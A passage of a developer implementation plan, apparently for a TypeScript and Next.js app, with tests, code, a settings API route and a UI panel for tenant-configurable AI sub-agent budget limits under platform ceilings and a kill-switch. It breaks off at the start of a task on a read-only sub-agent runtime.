+```typescript
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+
+vi.mock('@/lib/tenant-config-service', () => ({
+    TenantConfigService: { getConfig: vi.fn() },
+}));
+
+import { TenantConfigService } from '@/lib/tenant-config-service';
+import {
+    clampBudget,
+    resolveSubagentBudget,
+    validateBudgetInput,
+    platformSubagentsEnabled,
+    BUDGET_BOUNDS,
+} from './subagent-budget';
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    process.env.SUBAGENTS_ENABLED = 'true';
+});
+afterEach(() => {
+    delete process.env.SUBAGENTS_ENABLED;
+    delete process.env.SUBAGENT_MAX_CONCURRENCY;
+});
+
+describe('platformSubagentsEnabled', () => {
+    it('is false unless SUBAGENTS_ENABLED is exactly "true"', () => {
+        delete process.env.SUBAGENTS_ENABLED;
+        expect(platformSubagentsEnabled()).toBe(false);
+        process.env.SUBAGENTS_ENABLED = 'false';
+        expect(platformSubagentsEnabled()).toBe(false);
+        process.env.SUBAGENTS_ENABLED = 'true';
+        expect(platformSubagentsEnabled()).toBe(true);
+    });
+});
+
+describe('clampBudget', () => {
+    it('returns defaults for null input', () => {
+        const budget = clampBudget(null);
+        expect(budget.maxConcurrentSubagents).toBe(BUDGET_BOUNDS.maxConcurrentSubagents.default);
+        expect(budget.enabled).toBe(false);
+    });
+
+    it('clamps a value above the ceiling down', () => {
+        expect(clampBudget({ maxConcurrentSubagents: 50 }).maxConcurrentSubagents)
+            .toBe(BUDGET_BOUNDS.maxConcurrentSubagents.max);
+    });
+
+    it('clamps a value below the floor up', () => {
+        expect(clampBudget({ maxSubagentsPerRun: 0 }).maxSubagentsPerRun)
+            .toBe(BUDGET_BOUNDS.maxSubagentsPerRun.min);
+    });
+
+    it('rounds non-integers', () => {
+        expect(clampBudget({ subagentMaxIterations: 7.6 }).subagentMaxIterations).toBe(8);
+    });
+
+    it('falls back to the default for non-numeric values', () => {
+        expect(clampBudget({ subagentTimeoutMs: 'abc' as unknown as number }).subagentTimeoutMs)
+            .toBe(BUDGET_BOUNDS.subagentTimeoutMs.default);
+    });
+
+    it('honours an env ceiling lower than the built-in max', () => {
+        process.env.SUBAGENT_MAX_CONCURRENCY = '2';
+        expect(clampBudget({ maxConcurrentSubagents: 6 }).maxConcurrentSubagents).toBe(2);
+    });
+});
+
+describe('resolveSubagentBudget', () => {
+    it('returns a disabled budget when the platform kill-switch is off', async () => {
+        process.env.SUBAGENTS_ENABLED = 'false';
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue({ enabled: true } as never);
+
+        expect((await resolveSubagentBudget('t1')).enabled).toBe(false);
+    });
+
+    it('returns tenant config clamped when the platform allows it', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue({
+            enabled: true, maxConcurrentSubagents: 99,
+        } as never);
+
+        const budget = await resolveSubagentBudget('t1');
+        expect(budget.enabled).toBe(true);
+        expect(budget.maxConcurrentSubagents).toBe(BUDGET_BOUNDS.maxConcurrentSubagents.max);
+    });
+
+    it('returns defaults (disabled) when the tenant has no config', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue(null as never);
+        expect((await resolveSubagentBudget('t1')).enabled).toBe(false);
+    });
+
+    it('never throws when the config read fails', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockRejectedValue(new Error('db down'));
+        await expect(resolveSubagentBudget('t1')).resolves.toMatchObject({ enabled: false });
+    });
+});
+
+describe('validateBudgetInput', () => {
+    it('accepts a well-formed payload', () => {
+        expect(validateBudgetInput({
+            enabled: true, maxConcurrentSubagents: 3, maxSubagentsPerRun: 8,
+            maxSubagentTokensPerRun: 400000, subagentMaxIterations: 8, subagentTimeoutMs: 180000,
+        })).toBeNull();
+    });
+
+    it('rejects a non-object', () => {
+        expect(validateBudgetInput(null)).toMatch(/object/i);
+    });
+
+    it('rejects a non-boolean enabled', () => {
+        expect(validateBudgetInput({ enabled: 'yes' })).toMatch(/enabled/i);
+    });
+
+    it('rejects an out-of-range number with a message naming the field', () => {
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: 999 }))
+            .toMatch(/maxConcurrentSubagents/);
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent-budget.test.ts`
+Expected: FAIL — cannot resolve `./subagent-budget`.
+
+- [ ] **Step 3: Implement the module**
+
+Create `apps/web-ui/lib/agent/subagent-budget.ts`:
+
+```typescript
+/**
+ * Sub-agent budget configuration.
+ *
+ * web-ui runs as a SHARED ECS task, so these limits cannot be purely
+ * tenant-controlled: one tenant setting concurrency to 50 would saturate the
+ * container's event loop for every co-tenant and flood their Bedrock quota.
+ * Env vars are therefore CEILINGS, not overrides:
+ *
+ *     effective = clamp(tenantConfig ?? default, MIN, envCeiling)
+ *
+ * Clamping runs on READ (not only on write) so lowering a ceiling retroactively
+ * binds config rows written while it was higher.
+ *
+ * SUBAGENTS_ENABLED is an absolute platform kill-switch: tenant config can
+ * never re-enable the feature when it is off.
+ */
+import { TenantConfigService } from '@/lib/tenant-config-service';
+
+export const SUBAGENT_CONFIG_KEY = 'aiops-subagents';
+
+export interface SubagentBudgetConfig {
+    enabled: boolean;
+    maxConcurrentSubagents: number;
+    maxSubagentsPerRun: number;
+    maxSubagentTokensPerRun: number;
+    subagentMaxIterations: number;
+    subagentTimeoutMs: number;
+}
+
+type NumericKey = keyof Omit<SubagentBudgetConfig, 'enabled'>;
+
+interface Bound { min: number; max: number; default: number; envCeiling: string }
+
+/**
+ * `max` is the hard platform ceiling. `envCeiling` names an env var that may
+ * lower it further (never raise it) for a given deployment.
+ */
+const BOUNDS_SPEC: Record<NumericKey, Bound> = {
+    maxConcurrentSubagents:  { min: 1,      max: 6,       default: 3,       envCeiling: 'SUBAGENT_MAX_CONCURRENCY' },
+    maxSubagentsPerRun:      { min: 1,      max: 16,      default: 8,       envCeiling: 'SUBAGENT_MAX_PER_RUN' },
+    maxSubagentTokensPerRun: { min: 50_000, max: 1_000_000, default: 400_000, envCeiling: 'SUBAGENT_MAX_TOKENS_PER_RUN' },
+    subagentMaxIterations:   { min: 2,      max: 16,      default: 8,       envCeiling: 'SUBAGENT_MAX_ITERATIONS' },
+    subagentTimeoutMs:       { min: 30_000, max: 300_000, default: 180_000, envCeiling: 'SUBAGENT_TIMEOUT_MS' },
+};
+
+export const BUDGET_BOUNDS = BOUNDS_SPEC;
+
+/** The effective ceiling: the built-in max, lowered (never raised) by env. */
+function ceilingFor(key: NumericKey): number {
+    const spec = BOUNDS_SPEC[key];
+    const fromEnv = Number(process.env[spec.envCeiling]);
+    if (!Number.isFinite(fromEnv) || fromEnv <= 0) return spec.max;
+    return Math.min(spec.max, Math.round(fromEnv));
+}
+
+/** Absolute platform kill-switch. Defaults to OFF. */
+export function platformSubagentsEnabled(): boolean {
+    return process.env.SUBAGENTS_ENABLED === 'true';
+}
+
+export function clampBudget(input: Partial<SubagentBudgetConfig> | null): SubagentBudgetConfig {
+    const result: Record<string, unknown> = { enabled: input?.enabled === true };
+
+    for (const key of Object.keys(BOUNDS_SPEC) as NumericKey[]) {
+        const spec = BOUNDS_SPEC[key];
+        const raw = Number(input?.[key]);
+        const value = Number.isFinite(raw) ? Math.round(raw) : spec.default;
+        result[key] = Math.min(ceilingFor(key), Math.max(spec.min, value));
+    }
+
+    return result as unknown as SubagentBudgetConfig;
+}
+
+/**
+ * Read a tenant's budget, clamped. Never throws: a config-store failure must
+ * degrade to "sub-agents off", not break the chat run.
+ */
+export async function resolveSubagentBudget(tenantId: string): Promise<SubagentBudgetConfig> {
+    if (!platformSubagentsEnabled()) {
+        return { ...clampBudget(null), enabled: false };
+    }
+
+    const stored = await TenantConfigService
+        .getConfig<Partial<SubagentBudgetConfig>>(SUBAGENT_CONFIG_KEY, tenantId)
+        .catch(() => null);
+
+    return clampBudget(stored);
+}
+
+/** Validate a PUT payload. Returns an error string for a 400, or null. */
+export function validateBudgetInput(input: unknown): string | null {
+    if (!input || typeof input !== 'object' || Array.isArray(input)) {
+        return 'Request body must be an object';
+    }
+    const body = input as Record<string, unknown>;
+
+    if (typeof body.enabled !== 'boolean') {
+        return 'enabled must be a boolean';
+    }
+
+    for (const key of Object.keys(BOUNDS_SPEC) as NumericKey[]) {
+        if (body[key] === undefined) continue;
+        const spec = BOUNDS_SPEC[key];
+        const value = Number(body[key]);
+        const ceiling = ceilingFor(key);
+        if (!Number.isInteger(value) || value < spec.min || value > ceiling) {
+            return `${key} must be an integer between ${spec.min} and ${ceiling}`;
+        }
+    }
+
+    return null;
+}
+```
+
+- [ ] **Step 4: Run the test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent-budget.test.ts`
+Expected: PASS, 15 tests.
+
+- [ ] **Step 5: Declare the env vars**
+
+In `apps/web-ui/env.ts`, add to the `server:` block alongside the other optional string vars (near `LLM_AUDIT` on line 51):
+
+```typescript
+        SUBAGENTS_ENABLED: z.string().optional(),
+        SUBAGENT_MAX_CONCURRENCY: z.string().optional(),
+        SUBAGENT_MAX_PER_RUN: z.string().optional(),
+        SUBAGENT_MAX_TOKENS_PER_RUN: z.string().optional(),
+        SUBAGENT_MAX_ITERATIONS: z.string().optional(),
+        SUBAGENT_TIMEOUT_MS: z.string().optional(),
+        TOOL_CONCURRENCY: z.string().optional(),
+```
+
+Add matching commented entries to the repo-root `.env.example`:
+
+```bash
+# AI Ops sub-agents (Layer B). SUBAGENTS_ENABLED is an absolute platform
+# kill-switch — tenant settings cannot re-enable it when false.
+# The SUBAGENT_MAX_* vars are CEILINGS that lower (never raise) the built-in
+# maximums a tenant may configure.
+SUBAGENTS_ENABLED=false
+# SUBAGENT_MAX_CONCURRENCY=6
+# SUBAGENT_MAX_PER_RUN=16
+# SUBAGENT_MAX_TOKENS_PER_RUN=1000000
+# SUBAGENT_MAX_ITERATIONS=16
+# SUBAGENT_TIMEOUT_MS=300000
+# Max concurrent shell subprocesses from execute_command (Layer A).
+# TOOL_CONCURRENCY=6
+```
+
+- [ ] **Step 6: Verify typecheck**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add apps/web-ui/lib/agent/subagent-budget.ts apps/web-ui/lib/agent/subagent-budget.test.ts apps/web-ui/env.ts .env.example
+git commit -m "feat(agent): sub-agent budget config with platform ceilings
+
+Tenant-configurable sub-agent limits resolved as
+clamp(tenantConfig ?? default, MIN, envCeiling), applied on read so lowering a
+ceiling binds existing rows. SUBAGENTS_ENABLED is an absolute kill-switch."
+```
+
+---
+
+### Task 5: AI Ops settings API route
+
+**Files:**
+- Create: `apps/web-ui/app/api/settings/aiops/route.ts`
+- Create: `apps/web-ui/app/api/settings/aiops/route.test.ts`
+
+**Interfaces:**
+- Consumes: `resolveSubagentBudget`, `validateBudgetInput`, `clampBudget`, `platformSubagentsEnabled`, `BUDGET_BOUNDS`, `SUBAGENT_CONFIG_KEY` from Task 4.
+- Produces: `GET /api/settings/aiops` → `{ success: true, data: { budget: SubagentBudgetConfig, bounds, platformEnabled: boolean } }`; `PUT` → `{ success: true, data: { budget: SubagentBudgetConfig } }`.
+
+- [ ] **Step 1: Write the failing test**
+
+Create `apps/web-ui/app/api/settings/aiops/route.test.ts`:
+
+```typescript
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+
+vi.mock('@/lib/rbac/authorize', () => ({ authorize: vi.fn() }));
+vi.mock('@/lib/auth-session', () => ({ getSessionTenantId: vi.fn() }));
+vi.mock('next-auth', () => ({ getServerSession: vi.fn() }));
+vi.mock('@/lib/auth-options', () => ({ authOptions: {} }));
+vi.mock('@/lib/tenant-config-service', () => ({
+    TenantConfigService: { getConfig: vi.fn(), saveConfig: vi.fn() },
+}));
+vi.mock('@/lib/audit-service', () => ({
+    AuditService: { logUserAction: vi.fn().mockResolvedValue(undefined) },
+}));
+
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getServerSession } from 'next-auth';
+import { TenantConfigService } from '@/lib/tenant-config-service';
+import { AuditService } from '@/lib/audit-service';
+import { GET, PUT } from './route';
+
+const putRequest = (body: unknown) =>
+    ({ json: async () => body }) as unknown as Parameters<typeof PUT>[0];
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    process.env.SUBAGENTS_ENABLED = 'true';
+    vi.mocked(authorize).mockResolvedValue(null as never);
+    vi.mocked(getSessionTenantId).mockResolvedValue('t1' as never);
+    vi.mocked(getServerSession).mockResolvedValue({ user: { email: 'a@b.com' } } as never);
+    vi.mocked(TenantConfigService.getConfig).mockResolvedValue(null as never);
+});
+afterEach(() => { delete process.env.SUBAGENTS_ENABLED; });
+
+describe('GET /api/settings/aiops', () => {
+    it('returns the effective budget, bounds, and platform flag', async () => {
+        const body = await (await GET()).json();
+
+        expect(body.success).toBe(true);
+        expect(body.data.platformEnabled).toBe(true);
+        expect(body.data.budget.maxConcurrentSubagents).toBe(3);
+        expect(body.data.bounds.maxConcurrentSubagents.max).toBe(6);
+    });
+
+    it('propagates an RBAC denial', async () => {
+        const denied = { status: 403 };
+        vi.mocked(authorize).mockResolvedValue(denied as never);
+        expect(await GET()).toBe(denied);
+    });
+
+    it('403s with no tenant context', async () => {
+        vi.mocked(getSessionTenantId).mockResolvedValue(null as never);
+        expect((await GET()).status).toBe(403);
+    });
+});
+
+describe('PUT /api/settings/aiops', () => {
+    const valid = {
+        enabled: true, maxConcurrentSubagents: 4, maxSubagentsPerRun: 8,
+        maxSubagentTokensPerRun: 400000, subagentMaxIterations: 8, subagentTimeoutMs: 180000,
+    };
+
+    it('saves a valid payload and audits it', async () => {
+        const res = await PUT(putRequest(valid));
+        const body = await res.json();
+
+        expect(body.success).toBe(true);
+        expect(body.data.budget.maxConcurrentSubagents).toBe(4);
+        expect(TenantConfigService.saveConfig).toHaveBeenCalledWith(
+            'aiops-subagents', expect.objectContaining({ maxConcurrentSubagents: 4 }), 't1', 'a@b.com',
+        );
+        expect(AuditService.logUserAction).toHaveBeenCalled();
+    });
+
+    it('400s on an out-of-range value', async () => {
+        const res = await PUT(putRequest({ ...valid, maxConcurrentSubagents: 999 }));
+        expect(res.status).toBe(400);
+        expect((await res.json()).error).toMatch(/maxConcurrentSubagents/);
+    });
+
+    it('400s when enabled is missing', async () => {
+        const { enabled, ...rest } = valid;
+        expect((await PUT(putRequest(rest))).status).toBe(400);
+    });
+
+    it('persists the clamped value, not the raw one', async () => {
+        process.env.SUBAGENT_MAX_CONCURRENCY = '2';
+        await PUT(putRequest({ ...valid, maxConcurrentSubagents: 2 }));
+        expect(TenantConfigService.saveConfig).toHaveBeenCalledWith(
+            'aiops-subagents', expect.objectContaining({ maxConcurrentSubagents: 2 }), 't1', 'a@b.com',
+        );
+        delete process.env.SUBAGENT_MAX_CONCURRENCY;
+    });
+
+    it('propagates an RBAC denial', async () => {
+        const denied = { status: 403 };
+        vi.mocked(authorize).mockResolvedValue(denied as never);
+        expect(await PUT(putRequest(valid))).toBe(denied);
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run app/api/settings/aiops/route.test.ts`
+Expected: FAIL — cannot resolve `./route`.
+
+- [ ] **Step 3: Implement the route**
+
+Create `apps/web-ui/app/api/settings/aiops/route.ts`:
+
+```typescript
+import { NextRequest, NextResponse } from 'next/server';
+import { authorize } from '@/lib/rbac/authorize';
+import { getSessionTenantId } from '@/lib/auth-session';
+import { getServerSession } from 'next-auth';
+import { authOptions } from '@/lib/auth-options';
+import { TenantConfigService } from '@/lib/tenant-config-service';
+import { AuditService } from '@/lib/audit-service';
+import {
+    SUBAGENT_CONFIG_KEY,
+    BUDGET_BOUNDS,
+    clampBudget,
+    platformSubagentsEnabled,
+    resolveSubagentBudget,
+    validateBudgetInput,
+} from '@/lib/agent/subagent-budget';
+
+export async function GET() {
+    console.log('API - GET /api/settings/aiops - Fetching sub-agent budget');
+
+    const authError = await authorize('read', 'Agent');
+    if (authError) return authError;
+
+    try {
+        const tenantId = await getSessionTenantId();
+        if (!tenantId) {
+            return NextResponse.json({ success: false, error: 'No tenant context' }, { status: 403 });
+        }
+
+        const budget = await resolveSubagentBudget(tenantId);
+
+        return NextResponse.json({
+            success: true,
+            data: {
+                budget,
+                // The UI renders sliders bounded by these, and explains why a
+                // ceiling is what it is rather than silently clipping input.
+                bounds: BUDGET_BOUNDS,
+                platformEnabled: platformSubagentsEnabled(),
+            },
+        });
+    } catch (error) {
+        console.error('API - Error fetching AI Ops settings:', error);
+        return NextResponse.json(
+            { success: false, error: error instanceof Error ? error.message : 'Failed to fetch AI Ops settings' },
+            { status: 500 },
+        );
+    }
+}
+
+export async function PUT(request: NextRequest) {
+    console.log('API - PUT /api/settings/aiops - Saving sub-agent budget');
+
+    const authError = await authorize('update', 'Agent');
+    if (authError) return authError;
+
+    try {
+        const tenantId = await getSessionTenantId();
+        if (!tenantId) {
+            return NextResponse.json({ success: false, error: 'No tenant context' }, { status: 403 });
+        }
+
+        const body = await request.json();
+        const validationError = validateBudgetInput(body);
+        if (validationError) {
+            return NextResponse.json({ success: false, error: validationError }, { status: 400 });
+        }
+
+        // Persist the CLAMPED value so a stored row can never exceed the ceiling
+        // that was in force when it was written.
+        const budget = clampBudget(body);
+
+        const session = await getServerSession(authOptions);
+        const updatedBy = session?.user?.email || 'api-user';
+
+        await TenantConfigService.saveConfig(SUBAGENT_CONFIG_KEY, budget, tenantId, updatedBy);
+
+        await AuditService.logUserAction({
+            eventType: 'aiops.subagents.settings.updated',
+            severity: 'medium',
+            apiRoute: 'PUT /api/settings/aiops',
+            httpMethod: 'PUT',
+            action: 'Update AI Ops Sub-Agent Settings',
+            resourceType: 'settings',
+            resourceId: SUBAGENT_CONFIG_KEY,
+            resourceName: 'AI Ops Sub-Agent Budget',
+            user: updatedBy,
+            userType: 'user',
+            status: 'success',
+            details: `Sub-agents ${budget.enabled ? 'enabled' : 'disabled'}; concurrency=${budget.maxConcurrentSubagents}, perRun=${budget.maxSubagentsPerRun}, tokenBudget=${budget.maxSubagentTokensPerRun}`,
+            tenantId,
+        });
+
+        return NextResponse.json({ success: true, data: { budget } });
+    } catch (error) {
+        console.error('API - Error saving AI Ops settings:', error);
+        return NextResponse.json(
+            { success: false, error: error instanceof Error ? error.message : 'Failed to save AI Ops settings' },
+            { status: 500 },
+        );
+    }
+}
+```
+
+- [ ] **Step 4: Run the test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run app/api/settings/aiops/route.test.ts`
+Expected: PASS, 9 tests.
+
+- [ ] **Step 5: Typecheck and commit**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+```bash
+git add apps/web-ui/app/api/settings/aiops/
+git commit -m "feat(api): GET/PUT /api/settings/aiops for sub-agent budget
+
+Reuses the Agent RBAC subject (already mapped to the AIOps module) and stores
+the clamped budget under the aiops-subagents tenant-config key."
+```
+
+---
+
+### Task 6: AI Ops settings UI
+
+**Files:**
+- Create: `apps/web-ui/lib/queries/aiops-settings.ts`
+- Create: `apps/web-ui/components/settings/aiops-subagent-settings.tsx`
+- Create: `apps/web-ui/app/app/agent-ops/settings/subagents/page.tsx`
+- Modify: `apps/web-ui/lib/queries/query-keys.ts`
+
+**Interfaces:**
+- Consumes: `GET`/`PUT /api/settings/aiops` from Task 5; `SubagentBudgetConfig` from Task 4.
+- Produces: `useAiopsSubagentSettings()`, `useSaveAiopsSubagentSettings()`, `<AiopsSubagentSettings />`.
+
+- [ ] **Step 1: Add the query key**
+
+In `apps/web-ui/lib/queries/query-keys.ts`, add a domain entry alongside the others:
+
+```typescript
+    aiopsSettings: {
+        all: ['aiops-settings'] as const,
+        subagents: () => [...queryKeys.aiopsSettings.all, 'subagents'] as const,
+    },
+```
+
+- [ ] **Step 2: Write the query hooks**
+
+Create `apps/web-ui/lib/queries/aiops-settings.ts`:
+
+```typescript
+'use client';
+
+/**
+ * TanStack Query hooks for the AI Ops sub-agent budget (per-tenant).
+ */
+import { useMutation, useQuery, useQueryClient } from '@tanstack/react-query';
+import { queryKeys } from './query-keys';
+
+export interface SubagentBudget {
+    enabled: boolean;
+    maxConcurrentSubagents: number;
+    maxSubagentsPerRun: number;
+    maxSubagentTokensPerRun: number;
+    subagentMaxIterations: number;
+    subagentTimeoutMs: number;
+}
+
+export interface SubagentBound { min: number; max: number; default: number }
+
+export interface AiopsSubagentSettings {
+    budget: SubagentBudget;
+    bounds: Record<keyof Omit<SubagentBudget, 'enabled'>, SubagentBound>;
+    /** False when SUBAGENTS_ENABLED is off for the whole deployment. */
+    platformEnabled: boolean;
+}
+
+export function useAiopsSubagentSettings() {
+    return useQuery({
+        queryKey: queryKeys.aiopsSettings.subagents(),
+        queryFn: async (): Promise<AiopsSubagentSettings> => {
+            const res = await fetch('/api/settings/aiops');
+            const json = await res.json().catch(() => ({}));
+            if (!res.ok || !json.success) {
+                throw new Error(json.error || 'Failed to load AI Ops settings');
+            }
+            return json.data as AiopsSubagentSettings;
+        },
+    });
+}
+
+export function useSaveAiopsSubagentSettings() {
+    const qc = useQueryClient();
+    return useMutation({
+        mutationFn: async (body: SubagentBudget): Promise<SubagentBudget> => {
+            const res = await fetch('/api/settings/aiops', {
+                method: 'PUT',
+                headers: { 'Content-Type': 'application/json' },
+                body: JSON.stringify(body),
+            });
+            const json = await res.json().catch(() => ({}));
+            if (!res.ok || !json.success) {
+                throw new Error(json.error || 'Failed to save AI Ops settings');
+            }
+            return json.data.budget as SubagentBudget;
+        },
+        onSuccess: () => qc.invalidateQueries({ queryKey: queryKeys.aiopsSettings.all }),
+    });
+}
+```
+
+- [ ] **Step 3: Build the settings panel**
+
+Create `apps/web-ui/components/settings/aiops-subagent-settings.tsx`. Note 2-space indentation (components convention) and React Hook Form + Zod per the global constraints:
+
+```tsx
+'use client';
+
+import { useEffect } from 'react';
+import { useForm } from 'react-hook-form';
+import { zodResolver } from '@hookform/resolvers/zod';
+import { z } from 'zod';
+import { toast } from 'sonner';
+import { Bot, Gauge, Loader2, Save } from 'lucide-react';
+
+import {
+  useAiopsSubagentSettings,
+  useSaveAiopsSubagentSettings,
+  type SubagentBudget,
+} from '@/lib/queries/aiops-settings';
+import { Button } from '@/components/ui/button';
+import { Card, CardContent, CardDescription, CardHeader, CardTitle } from '@/components/ui/card';
+import { Input } from '@/components/ui/input';
+import { Label } from '@/components/ui/label';
+import { Switch } from '@/components/ui/switch';
+import { Alert, AlertDescription } from '@/components/ui/alert';
+import { Spinner } from '@/components/ui/spinner';
+
+const schema = z.object({
+  enabled: z.boolean(),
+  maxConcurrentSubagents: z.number().int(),
+  maxSubagentsPerRun: z.number().int(),
+  maxSubagentTokensPerRun: z.number().int(),
+  subagentMaxIterations: z.number().int(),
+  subagentTimeoutMs: z.number().int(),
+});
+
+type FormValues = z.infer<typeof schema>;
+
+const FIELDS: Array<{
+  name: keyof Omit<SubagentBudget, 'enabled'>;
+  label: string;
+  help: string;
+}> = [
+  {
+    name: 'maxConcurrentSubagents',
+    label: 'Concurrent sub-agents',
+    help: 'How many sub-agents may run at the same time. Higher finishes fan-out work faster but increases the chance of provider throttling.',
+  },
+  {
+    name: 'maxSubagentsPerRun',
+    label: 'Sub-agents per run',
+    help: 'Total sub-agents a single chat run may dispatch before it falls back to working serially.',
+  },
+  {
+    name: 'maxSubagentTokensPerRun',
+    label: 'Token budget per run',
+    help: 'Combined sub-agent token spend allowed in one run. When exhausted, the agent completes the work itself instead of failing.',
+  },
+  {
+    name: 'subagentMaxIterations',
+    label: 'Iterations per sub-agent',
+    help: 'Reasoning/tool laps a single sub-agent may take before it must report what it has found.',
+  },
+  {
+    name: 'subagentTimeoutMs',
+    label: 'Sub-agent timeout (ms)',
+    help: 'Wall-clock limit for one sub-agent. On timeout it returns partial findings rather than failing the run.',
+  },
+];
+
+export function AiopsSubagentSettings() {
+  const { data, isLoading, error } = useAiopsSubagentSettings();
+  const saveMutation = useSaveAiopsSubagentSettings();
+
+  const form = useForm<FormValues>({
+    resolver: zodResolver(schema),
+    defaultValues: {
+      enabled: false,
+      maxConcurrentSubagents: 3,
+      maxSubagentsPerRun: 8,
+      maxSubagentTokensPerRun: 400000,
+      subagentMaxIterations: 8,
+      subagentTimeoutMs: 180000,
+    },
+  });
+
+  useEffect(() => {
+    if (data?.budget) form.reset(data.budget);
+  }, [data, form]);
+
+  if (isLoading) {
+    return (
+      <div className="flex-1 flex items-center justify-center py-12">
+        <Spinner />
+      </div>
+    );
+  }
+
+  if (error) {
+    return (
+      <Alert variant="destructive">
+        <AlertDescription>{(error as Error).message}</AlertDescription>
+      </Alert>
+    );
+  }
+
+  const platformEnabled = data?.platformEnabled ?? false;
+  const bounds = data?.bounds;
+
+  const onSubmit = async (values: FormValues) => {
+    // Bounds are enforced server-side too; this only produces a friendlier message.
+    for (const field of FIELDS) {
+      const bound = bounds?.[field.name];
+      const value = values[field.name];
+      if (bound && (value < bound.min || value > bound.max)) {
+        toast.error(`${field.label} must be between ${bound.min} and ${bound.max}`);
+        return;
+      }
+    }
+    try {
+      await saveMutation.mutateAsync(values);
+      toast.success('Sub-agent settings saved — new runs will use this configuration');
+    } catch (err) {
+      toast.error(err instanceof Error ? err.message : 'Failed to save sub-agent settings');
+    }
+  };
+
+  return (
+    <form onSubmit={form.handleSubmit(onSubmit)} className="flex-1 max-w-3xl mx-auto space-y-6">
+      <div>
+        <h1 className="text-2xl font-bold">Sub-Agents</h1>
+        <p className="text-muted-foreground mt-1">
+          Sub-agents let one AI Ops run investigate several accounts or regions at the same time.
+          They are read-only: anything that changes infrastructure still runs on the main agent
+          under your normal approval flow.
+        </p>
+      </div>
+
+      {!platformEnabled && (
+        <Alert>
+          <AlertDescription>
+            Sub-agents are disabled for this deployment. These settings are saved but will not take
+            effect until an administrator enables the feature.
+          </AlertDescription>
+        </Alert>
+      )}
+
+      <Card>
+        <CardHeader>
+          <CardTitle className="text-base flex items-center gap-2">
+            <Bot className="h-4 w-4" />
+            Enable sub-agents
+          </CardTitle>
+          <CardDescription>
+            When off, every run executes serially exactly as before.
+          </CardDescription>
+        </CardHeader>
+        <CardContent>
+          <div className="flex items-center gap-3">
+            <Switch
+              id="enabled"
+              checked={form.watch('enabled')}
+              onCheckedChange={(checked) => form.setValue('enabled', checked, { shouldDirty: true })}
+              disabled={!platformEnabled}
+            />
+            <Label htmlFor="enabled">Dispatch sub-agents for parallel investigation</Label>
+          </div>
+        </CardContent>
+      </Card>
+
+      <Card>
+        <CardHeader>
+          <CardTitle className="text-base flex items-center gap-2">
+            <Gauge className="h-4 w-4" />
+            Budget limits
+          </CardTitle>
+          <CardDescription>
+            These bound how much work and spend one run may fan out. Exceeding a limit never fails
+            the run — the agent finishes the work serially instead.
+          </CardDescription>
+        </CardHeader>
+        <CardContent className="space-y-5">
+          {FIELDS.map((field) => {
+            const bound = bounds?.[field.name];
+            return (
+              <div key={field.name} className="space-y-2">
+                <Label htmlFor={field.name}>{field.label}</Label>
+                <Input
+                  id={field.name}
+                  type="number"
+                  className="w-48"
+                  min={bound?.min}
+                  max={bound?.max}
+                  disabled={!platformEnabled}
+                  {...form.register(field.name, { valueAsNumber: true })}
+                />
+                <p className="text-xs text-muted-foreground">{field.help}</p>
+                {bound && (
+                  <p className="text-xs text-muted-foreground">
+                    Allowed: {bound.min}–{bound.max}. Default {bound.default}.
+                  </p>
+                )}
+              </div>
+            );
+          })}
+        </CardContent>
+      </Card>
+
+      <Button type="submit" disabled={saveMutation.isPending || !platformEnabled}>
+        {saveMutation.isPending ? (
+          <Loader2 className="h-4 w-4 mr-2 animate-spin" />
+        ) : (
+          <Save className="h-4 w-4 mr-2" />
+        )}
+        Save settings
+      </Button>
+    </form>
+  );
+}
+```
+
+- [ ] **Step 4: Add the page**
+
+Create `apps/web-ui/app/app/agent-ops/settings/subagents/page.tsx`:
+
+```tsx
+'use client';
+
+import { AiopsSubagentSettings } from '@/components/settings/aiops-subagent-settings';
+
+export default function AiopsSubagentSettingsPage() {
+  return (
+    <div className="flex-1 bg-background p-6">
+      <AiopsSubagentSettings />
+    </div>
+  );
+}
+```
+
+- [ ] **Step 5: Confirm the Switch and Spinner primitives exist**
+
+Run: `ls apps/web-ui/components/ui/switch.tsx apps/web-ui/components/ui/spinner.tsx`
+Expected: both files listed. If `switch.tsx` is absent, add it with `bunx shadcn@latest add switch` from `apps/web-ui` — do not hand-write a primitive.
+
+- [ ] **Step 6: Typecheck, lint, and verify in the browser**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+Run: `cd apps/web-ui && bun run lint`
+Expected: no new errors.
+
+Start the dev server and open `http://localhost:3001/app/agent-ops/settings/subagents`. Confirm: values load, the platform-disabled alert shows when `SUBAGENTS_ENABLED` is unset, saving fires a success toast, and an out-of-range value produces an error toast.
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add apps/web-ui/lib/queries/aiops-settings.ts apps/web-ui/lib/queries/query-keys.ts apps/web-ui/components/settings/aiops-subagent-settings.tsx apps/web-ui/app/app/agent-ops/settings/subagents/
+git commit -m "feat(ui): AI Ops sub-agent budget settings panel"
+```
+
+---
+
+### Task 7: Sub-agent runtime with the read-only jail
+
+The core of Layer B. An ephemeral ReAct loop that cannot mutate anything, cannot spawn further sub-agents, and always returns a bounded report string.
+
+**Files:**
+- Create: `apps/web-ui/lib/agent/subagent.ts`
+- Create: `apps/web-ui/lib/agent/subagent.test.ts`
+
+**Interfaces:**
